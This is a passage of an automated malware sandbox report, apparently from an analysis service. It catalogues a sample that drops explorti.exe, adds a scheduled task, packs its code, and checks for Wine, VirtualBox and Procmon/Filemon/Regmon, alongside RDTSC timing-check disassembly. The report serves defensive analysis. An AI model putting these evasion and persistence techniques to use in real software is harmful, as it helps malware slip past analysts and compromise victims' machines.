                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1884672 > 1048576
                    Source: file.exeStatic PE information: Raw size of mlkfqtwe is bigger than: 0x100000 < 0x19aa00

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.850000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 1.2.explorti.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 2.2.explorti.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 7.2.explorti.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: random[1].exe.7.drStatic PE information: real checksum: 0x1c9af8 should be: 0x192d6f
                    Source: explorti.exe.0.drStatic PE information: real checksum: 0x1d392b should be: 0x1d7473
                    Source: 2c422e6624.exe.7.drStatic PE information: real checksum: 0x1c9af8 should be: 0x192d6f
                    Source: file.exeStatic PE information: real checksum: 0x1d392b should be: 0x1d7473
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: mlkfqtwe
                    Source: file.exeStatic PE information: section name: ezviljwn
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: mlkfqtwe
                    Source: explorti.exe.0.drStatic PE information: section name: ezviljwn
                    Source: explorti.exe.0.drStatic PE information: section name: .taggant
                    Source: random[1].exe.7.drStatic PE information: section name:
                    Source: random[1].exe.7.drStatic PE information: section name: .rsrc
                    Source: random[1].exe.7.drStatic PE information: section name: .idata
                    Source: random[1].exe.7.drStatic PE information: section name:
                    Source: random[1].exe.7.drStatic PE information: section name: agodkpeb
                    Source: random[1].exe.7.drStatic PE information: section name: frgsmfqf
                    Source: random[1].exe.7.drStatic PE information: section name: .taggant
                    Source: 2c422e6624.exe.7.drStatic PE information: section name:
                    Source: 2c422e6624.exe.7.drStatic PE information: section name: .rsrc
                    Source: 2c422e6624.exe.7.drStatic PE information: section name: .idata
                    Source: 2c422e6624.exe.7.drStatic PE information: section name:
                    Source: 2c422e6624.exe.7.drStatic PE information: section name: agodkpeb
                    Source: 2c422e6624.exe.7.drStatic PE information: section name: frgsmfqf
                    Source: 2c422e6624.exe.7.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A1D84C push ecx; ret 7_2_00A1D85F
                    Source: file.exeStatic PE information: section name: entropy: 7.988355421365411
                    Source: file.exeStatic PE information: section name: mlkfqtwe entropy: 7.953079364825396
                    Source: explorti.exe.0.drStatic PE information: section name: entropy: 7.988355421365411
                    Source: explorti.exe.0.drStatic PE information: section name: mlkfqtwe entropy: 7.953079364825396
                    Source: random[1].exe.7.drStatic PE information: section name: agodkpeb entropy: 7.953767082543736
                    Source: 2c422e6624.exe.7.drStatic PE information: section name: agodkpeb entropy: 7.953767082543736
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile created: C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26D33 second address: A26D3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26D3D second address: A26D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26D45 second address: A26D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26D49 second address: A26D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FA934C8B32Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C8C4 second address: A3C8D4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA9347D66B6h 0x00000008 jno 00007FA9347D66B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C8D4 second address: A3C8F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FA934C8B342h 0x0000000f jmp 00007FA934C8B32Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C8F8 second address: A3C8FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CA65 second address: A3CA69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CA69 second address: A3CA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CBD9 second address: A3CC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 js 00007FA934C8B326h 0x0000000d jmp 00007FA934C8B336h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jno 00007FA934C8B326h 0x0000001c jmp 00007FA934C8B32Bh 0x00000021 jo 00007FA934C8B326h 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CC18 second address: A3CC1F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CD7D second address: A3CD81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CD81 second address: A3CD97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA9347D66BCh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CF23 second address: A3CF2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CF2B second address: A3CF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D0B4 second address: A3D0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D0B8 second address: A3D0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA9347D66B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA9347D66BAh 0x00000013 jmp 00007FA9347D66BEh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D0DE second address: A3D0E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D0E2 second address: A3D0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA9347D66C4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D0FC second address: A3D108 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA934C8B32Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D268 second address: A3D270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EC58 second address: A3EC5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EC5E second address: A3ECB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov esi, dword ptr [ebp+122D1898h] 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D3824h] 0x0000001c call 00007FA9347D66B9h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FA9347D66C2h 0x00000029 jbe 00007FA9347D66B6h 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ECB1 second address: A3ECDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FA934C8B326h 0x00000009 jmp 00007FA934C8B332h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007FA934C8B326h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ECDA second address: A3ECDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ECDE second address: A3ECE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ECE4 second address: A3ED0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA9347D66BEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jp 00007FA9347D66B8h 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ED0A second address: A3EDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FA934C8B32Dh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 jno 00007FA934C8B328h 0x0000001a pop eax 0x0000001b pop eax 0x0000001c adc esi, 1266201Fh 0x00000022 push 00000003h 0x00000024 and dx, C52Bh 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c stc 0x0000002d pop ecx 0x0000002e push 00000003h 0x00000030 pushad 0x00000031 mov edi, 43CD63BBh 0x00000036 add edi, 1D27A928h 0x0000003c popad 0x0000003d jl 00007FA934C8B337h 0x00000043 call 00007FA934C8B32Ah 0x00000048 mov dword ptr [ebp+122D2339h], ebx 0x0000004e pop edx 0x0000004f push 88F41B54h 0x00000054 jmp 00007FA934C8B32Ch 0x00000059 add dword ptr [esp], 370BE4ACh 0x00000060 xor dword ptr [ebp+122D3649h], ebx 0x00000066 lea ebx, dword ptr [ebp+12453B4Fh] 0x0000006c jmp 00007FA934C8B334h 0x00000071 xchg eax, ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 jl 00007FA934C8B328h 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDAB second address: A3EDBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jbe 00007FA9347D66B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDBF second address: A3EDC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EDC3 second address: A3EDDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EE5B second address: A3EED1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FA934C8B328h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 movsx esi, dx 0x00000029 push 00000000h 0x0000002b call 00007FA934C8B329h 0x00000030 push ebx 0x00000031 jmp 00007FA934C8B335h 0x00000036 pop ebx 0x00000037 push eax 0x00000038 jmp 00007FA934C8B334h 0x0000003d mov eax, dword ptr [esp+04h] 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EED1 second address: A3EEE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA9347D66BBh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EEE4 second address: A3EEF6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jc 00007FA934C8B32Eh 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EEF6 second address: A3EF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EF04 second address: A3EF64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jns 00007FA934C8B328h 0x0000000e push 00000003h 0x00000010 push esi 0x00000011 sub di, E293h 0x00000016 pop esi 0x00000017 and ecx, 4ACC2200h 0x0000001d push 00000000h 0x0000001f call 00007FA934C8B336h 0x00000024 mov di, dx 0x00000027 pop esi 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D3808h] 0x00000030 call 00007FA934C8B329h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA934C8B332h 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EF64 second address: A3EFE6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA9347D66BEh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jp 00007FA9347D66C4h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jno 00007FA9347D66D2h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 jns 00007FA9347D66BCh 0x0000002a pop eax 0x0000002b mov cx, 0234h 0x0000002f lea ebx, dword ptr [ebp+12453B58h] 0x00000035 mov cx, FC25h 0x00000039 xchg eax, ebx 0x0000003a jbe 00007FA9347D66C4h 0x00000040 pushad 0x00000041 js 00007FA9347D66B6h 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F076 second address: A3F07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F07A second address: A3F0C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b add dword ptr [esp], 769624BAh 0x00000012 call 00007FA9347D66BDh 0x00000017 mov dword ptr [ebp+122D34C6h], edi 0x0000001d pop edx 0x0000001e push 00000003h 0x00000020 mov dword ptr [ebp+122D1908h], edx 0x00000026 push 00000000h 0x00000028 add dword ptr [ebp+122D34F4h], eax 0x0000002e push 00000003h 0x00000030 mov si, dx 0x00000033 push 833EB5ECh 0x00000038 push ecx 0x00000039 jl 00007FA9347D66BCh 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F0C3 second address: A3F121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xor dword ptr [esp], 433EB5ECh 0x0000000c jp 00007FA934C8B32Ch 0x00000012 lea ebx, dword ptr [ebp+12453B63h] 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FA934C8B328h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 xchg eax, ebx 0x00000033 jnp 00007FA934C8B334h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F121 second address: A3F125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F125 second address: A3F12B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F4D5 second address: A5F4EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA9347D66B6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA9347D66BBh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F4EC second address: A5F50A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B332h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jns 00007FA934C8B326h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A42D second address: A2A432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5D38A second address: A5D390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
